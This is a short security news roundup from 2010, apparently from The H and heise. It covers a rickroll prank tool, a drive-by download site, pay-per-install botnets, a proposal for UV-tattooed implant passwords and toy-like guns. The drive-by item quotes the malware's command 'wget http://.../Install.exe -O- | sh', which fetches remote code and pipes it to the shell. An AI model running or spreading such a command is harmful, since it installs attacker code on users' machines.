In association with heise online

23 April 2010, 17:16

Lost+Found: rickrolling, paper tiger, pay-per-install, tattoos, pretty weapons

  • Twitter
  • Facebook
  • submit to slashdot
  • StumbleUpon
  • submit to reddit

Too short for news, too good to lose; Lost+Found is a round up of useful security information. Today: a rickroll protector, an attack of impotence, friendly bot herders, tattooing passwords and guns disguised as toys.

Lost + Found icon Have you been rickrolled yet again? Well, help is, erm was, at hand, with the new rickroll protector, an April 1st offering from F-Secure.

The H's associates at heise Security recently discovered a drive-by download website which also targeted Linux and Mac OS X systems in its attacks. Close examination showed that, under Linux, using Runtime.getRuntime().exec() (no exploit involved), the Java code attempted to run the following: wget http://.../Install.exe -O- | sh . They weren't particularly impressed.

Bot herders don't always have to compete when it comes to infecting PCs – they can also give each other a helping hand. Some bots install other bots on a pay-per-install basis. The pay-per-install model is also reported to have been used to install scareware on infected computers. In view of the size of many botnets – 100,000 bots is not uncommon – there is good money to be made at a rate of a few dollars per installation.

Microsoft has proposedPDF requiring authentication before servicing medical implants, such as pacemakers and defibrillators, and tattooing the password onto the patient's skin using an ink which is only visible under UV.

Toys which look like real weapons are old hat, but real guns that look like toys? Criminals in the US are apparently now using disguised weapons that do just that.


Print Version | Send by email | Permalink:

  • July's Community Calendar

The H Open

The H Security

The H Developer

The H Internet Toolkit